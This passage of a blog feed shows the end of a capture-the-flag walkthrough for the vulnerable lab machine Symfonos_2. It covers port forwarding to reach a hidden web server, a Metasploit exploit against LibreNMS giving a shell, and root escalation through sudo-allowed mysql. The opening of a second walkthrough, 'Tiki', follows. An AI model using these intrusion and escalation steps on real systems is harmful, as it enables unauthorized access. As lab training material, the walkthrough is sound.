href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg4GrsrhkUMpDocNpQYtX-wJ64HSN5gaFCBbpstA26FazZbAoYxMgm-MHh3MO52knC1-xNPsHdmtdL-zI2KY3DdD8zxKl30uTzxq5-dVDlQcMTKoti0pL2xaRQnlWFFJaluS7Xbc-f7sEUeQBiY_DHH7xmnfYyaPRlRkJbyUULl1N9ANnbeb2NLATYclQ=s819&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;656&quot; data-original-width=&quot;819&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg4GrsrhkUMpDocNpQYtX-wJ64HSN5gaFCBbpstA26FazZbAoYxMgm-MHh3MO52knC1-xNPsHdmtdL-zI2KY3DdD8zxKl30uTzxq5-dVDlQcMTKoti0pL2xaRQnlWFFJaluS7Xbc-f7sEUeQBiY_DHH7xmnfYyaPRlRkJbyUULl1N9ANnbeb2NLATYclQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;4 - PRIVILEGE ESCALATION&lt;/b&gt;&lt;/span&gt;&lt;div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;netstat&lt;/b&gt; lists open connections, for instance at port 8080:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgIR5cPh1gwPKgmMTiVB_RfM8NsNe-Zb9qeUaiGt0Vc8_kISxoAA2-LS_H_Qv0SpXZ_AqCr8DaFC8V2ztPkShnXseju0QdEW12qvuAlFJDX3AMsZ9w34Zd5zEPkVUvtR8DhtqFfOgu-itPQl85ziCH9zqWimDj32jtRS7eYm6bDp8o5jHdHectpmppuYg=s690&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;413&quot; data-original-width=&quot;690&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgIR5cPh1gwPKgmMTiVB_RfM8NsNe-Zb9qeUaiGt0Vc8_kISxoAA2-LS_H_Qv0SpXZ_AqCr8DaFC8V2ztPkShnXseju0QdEW12qvuAlFJDX3AMsZ9w34Zd5zEPkVUvtR8DhtqFfOgu-itPQl85ziCH9zqWimDj32jtRS7eYm6bDp8o5jHdHectpmppuYg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- To access web server at port 8080 we must forward connection to another port, for instance 4444:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhVkwqfZybriqzULkHKQmg3pI5RH72FZKbSK0Q9RZQ87O7XrHKGkHoOE5WWC_gMOoZyA7k3bYIhMjNgAml7D-CneVwLo7_YTdeF8HxKfo_f2DbNfIX8Mf6e2LCXXOASMMu9ebcimCbrB3wezfvffzkDH9BwyJ9BEU_7SfdM6I-d3_xopW5qesU8sjmrWQ=s605&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;46&quot; data-original-width=&quot;605&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhVkwqfZybriqzULkHKQmg3pI5RH72FZKbSK0Q9RZQ87O7XrHKGkHoOE5WWC_gMOoZyA7k3bYIhMjNgAml7D-CneVwLo7_YTdeF8HxKfo_f2DbNfIX8Mf6e2LCXXOASMMu9ebcimCbrB3wezfvffzkDH9BwyJ9BEU_7SfdM6I-d3_xopW5qesU8sjmrWQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, connection to the hidden web server is available:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiuN0w8uZNBVtD1UUt9SloyS-9Vn-rFUOZB-1bHl1_8VCzAGQyFYRpOnBsvPk1ZaKb0-g5NvUYWVl0-oC_RPVMm0hlf-ENXbzNezL3F9rOImsF_6ncL-6Vko-MaL4FUtfXuHJTnWqpq4riXODlz47GBGHGLX3jwck_nZ4RXYH-8J-7Op2IguRnCS4ccGQ=s756&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;625&quot; data-original-width=&quot;756&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiuN0w8uZNBVtD1UUt9SloyS-9Vn-rFUOZB-1bHl1_8VCzAGQyFYRpOnBsvPk1ZaKb0-g5NvUYWVl0-oC_RPVMm0hlf-ENXbzNezL3F9rOImsF_6ncL-6Vko-MaL4FUtfXuHJTnWqpq4riXODlz47GBGHGLX3jwck_nZ4RXYH-8J-7Op2IguRnCS4ccGQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Application &lt;b&gt;LibreNMS&lt;/b&gt; is vulnerable to this exploit:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjYaDWtRpfbTEaEKEoT-2VdWhk9u-0iPBi9JsZxinftZmlpyTMvvL0SoWchoZWZm0u3LF2GuDPJ2_DvppbfFXd_oDsENOBK7vCpHeqvV4f4iHFU_lGAj8rVMuRE854ih6jHVjj-z380W47sG9PNRSEUctzUH3QTx1M_YfTLvvyWXjTgEUZ53vGImpkjyg=s842&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;299&quot; data-original-width=&quot;842&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjYaDWtRpfbTEaEKEoT-2VdWhk9u-0iPBi9JsZxinftZmlpyTMvvL0SoWchoZWZm0u3LF2GuDPJ2_DvppbfFXd_oDsENOBK7vCpHeqvV4f4iHFU_lGAj8rVMuRE854ih6jHVjj-z380W47sG9PNRSEUctzUH3QTx1M_YfTLvvyWXjTgEUZ53vGImpkjyg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Looking for a related Metasploit module:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEipZDoWeEU3zbKqmTeBuiNfRQt0TmAjqk_PlOyXf4Cc0TiivxMopY_78zNdiAj46fr49GrShyw2c2PNesPF74SLOTWCihnpm5S0kclyF7vnxs4hewI5YZlFSq574SbF8XPxVNSzqQfOkCCKRsftAmQxaexIF-79tU_cqg73Rs-jHOivBRUetblzRA_EBA=s1387&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;295&quot; data-original-width=&quot;1387&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEipZDoWeEU3zbKqmTeBuiNfRQt0TmAjqk_PlOyXf4Cc0TiivxMopY_78zNdiAj46fr49GrShyw2c2PNesPF74SLOTWCihnpm5S0kclyF7vnxs4hewI5YZlFSq574SbF8XPxVNSzqQfOkCCKRsftAmQxaexIF-79tU_cqg73Rs-jHOivBRUetblzRA_EBA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting parameters and running the exploit we have a new command shell, for user named &lt;b&gt;cronus&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgoyRp_Ip_FphSB5LvOysWZywGD5l5wyq3uYzJdX-yUCDdW5UfYZXXDjWlzRMwZl8zi3YcnTp3Q3zMJMjdptLlzykStvo3mCT7jNHQXGN-a5ZdCoT0nr0l430nkgCo1W_C5h6X6CniYeqr8gbb0mFFBignLWOu1-XAPvAC_0GpQvesXHvOx6VglpJnsvQ=s874&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;769&quot; data-original-width=&quot;874&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgoyRp_Ip_FphSB5LvOysWZywGD5l5wyq3uYzJdX-yUCDdW5UfYZXXDjWlzRMwZl8zi3YcnTp3Q3zMJMjdptLlzykStvo3mCT7jNHQXGN-a5ZdCoT0nr0l430nkgCo1W_C5h6X6CniYeqr8gbb0mFFBignLWOu1-XAPvAC_0GpQvesXHvOx6VglpJnsvQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Improving the shell:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhsAcCWcxy_ngeYzwntdtSSlMjRcjDRWdKplpX4w4_pwV7NSHkSaoI5TAH5TnY_YcbeQkhPeeScY56rAE9ihrundecvNLtSeH9X2gxprI7uqZe8JP8cM8hmWQ4jZNWHEgkQAzfH_gBpmOVJNvZtGKA0P11YJNO8wqNbWYf6283v3Mxw5k6koOZ3cPgduQ=s521&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;49&quot; data-original-width=&quot;521&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhsAcCWcxy_ngeYzwntdtSSlMjRcjDRWdKplpX4w4_pwV7NSHkSaoI5TAH5TnY_YcbeQkhPeeScY56rAE9ihrundecvNLtSeH9X2gxprI7uqZe8JP8cM8hmWQ4jZNWHEgkQAzfH_gBpmOVJNvZtGKA0P11YJNO8wqNbWYf6283v3Mxw5k6koOZ3cPgduQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Searching for &lt;b&gt;cronus&lt;/b&gt;&#39; sudoer privileges:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhNOrMoOYK2Wyh71lWU4GRhUI5KxKEwOLfN5updIY0i1OEASdmKArQvFbwj_7R4YPYDMqlJMpjY6wNLm5zsF1pfW1MtLREDN6wVgo5IBHHUABOcTjzZM7KUlaqZw7t5Z7M-va6BPksQG16w6EbWA2B6vtW6-QiFOWx22izujmR3N2j0Og1dPVFKfq3mHQ=s917&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;229&quot; data-original-width=&quot;917&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhNOrMoOYK2Wyh71lWU4GRhUI5KxKEwOLfN5updIY0i1OEASdmKArQvFbwj_7R4YPYDMqlJMpjY6wNLm5zsF1pfW1MtLREDN6wVgo5IBHHUABOcTjzZM7KUlaqZw7t5Z7M-va6BPksQG16w6EbWA2B6vtW6-QiFOWx22izujmR3N2j0Og1dPVFKfq3mHQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Command &lt;b&gt;mysql&lt;/b&gt; with option &lt;b&gt;\!&lt;/b&gt; allows to run any &lt;b&gt;\system&lt;/b&gt; command, as explained here:&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;a href=&quot;https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-commands.html&quot;&gt;https://dev.mysql.com/doc/mysql-shell/8.0/en/mysql-shell-commands.html&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiwjvv_IPwIMGUWbwbHxLntXMsx9JKS1-C1bHd2gmnI5aA1K7TS5J_VpZfTpOMlPxbMOvufltTs2dmdsYi4Hd38BSYLOv4A2zNuImjYHKMOZEPef9ZX59WyEZGA88ndtbt79OiiBDIIGvCSlYfRJtUhYIFvffToEv3iOxFtEhr7mYYmhgDf5oti4Otj6g&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;141&quot; data-original-width=&quot;931&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiwjvv_IPwIMGUWbwbHxLntXMsx9JKS1-C1bHd2gmnI5aA1K7TS5J_VpZfTpOMlPxbMOvufltTs2dmdsYi4Hd38BSYLOv4A2zNuImjYHKMOZEPef9ZX59WyEZGA88ndtbt79OiiBDIIGvCSlYfRJtUhYIFvffToEv3iOxFtEhr7mYYmhgDf5oti4Otj6g=s16000&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running &lt;b&gt;/bin/bash&lt;/b&gt; we get a remote root shell:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi2QS6--HyeTKzVgAhChGISvLOAxfB4EI7gqSkYt_l7qCE67W--bZKqSwBt-xrTfRcdp8jk_7UvrBEIvs3FRLXT0WLgc4byyoHCZkFxU_h3aCnuwzdgl6jgV8C5MRJLaLOHKAK3G4iou2VlI1uzcUH1r8sFjUTThrLC07k3NeGrOKzyToCIH_BkLOpbzQ=s724&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;116&quot; data-original-width=&quot;724&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEi2QS6--HyeTKzVgAhChGISvLOAxfB4EI7gqSkYt_l7qCE67W--bZKqSwBt-xrTfRcdp8jk_7UvrBEIvs3FRLXT0WLgc4byyoHCZkFxU_h3aCnuwzdgl6jgV8C5MRJLaLOHKAK3G4iou2VlI1uzcUH1r8sFjUTThrLC07k3NeGrOKzyToCIH_BkLOpbzQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgZTCX7lUauN7-8k8KVpwPkN_XQY-4L6UTqubgild0SXrwUuTSEwXSzp_N2_Msw9vlsBgnMgyn2HW7cIBzqGVfKvHhAh3iva6eBB7tNDWeKnZ_aL8X1zb1sTKECgkfXNIUV4VAQTCD8ieQC6Hch3ltPB6TFW3jYokT4jb7q2a5d4R5zFAANep1hJ8kBJg=s878&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;723&quot; data-original-width=&quot;878&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgZTCX7lUauN7-8k8KVpwPkN_XQY-4L6UTqubgild0SXrwUuTSEwXSzp_N2_Msw9vlsBgnMgyn2HW7cIBzqGVfKvHhAh3iva6eBB7tNDWeKnZ_aL8X1zb1sTKECgkfXNIUV4VAQTCD8ieQC6Hch3ltPB6TFW3jYokT4jb7q2a5d4R5zFAANep1hJ8kBJg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/3508809789021788720'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/3508809789021788720'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/symfonos2.html' title='Symfonos_2'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEgZGRCYEo0SxKrzkAkKxzNk3pqwT65DrRqF41hg961V25_jwxK0mTMQURgk581LnFO7nOF-yh8ubjFPKnBMPSH8ZZrfKk_bPp3v9GA3Vt17FUFcCXb0vy82hUhESgAR6irpA3IiLCdAHVC20c3b2Rp8cqS51Pp4xcHuzxZehMIIhW4nDRCmYPcyNFQdJg=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-6309731334704853861</id><published>2022-02-19T13:34:00.001-06:00</published><updated>2022-02-19T13:39:40.354-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Tiki</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;TIKI&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgAO-6_eJNTYPCK3HeXdvSMptkj7-4sVUSHsZqCfONrDDFQnkEIoclvotgfeV7Nl0zXLO4V9uhcXYDhr9IWYHQhgnoM1HSKYRSIjCSZxDNMnxnWT8BNFWmvXPy89zSQJc6V3HbrABspug-nX7S4qXyoPT0p6o98FOzCudqo13ZNl1oY4MHvwJRxp3c_xQ&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; 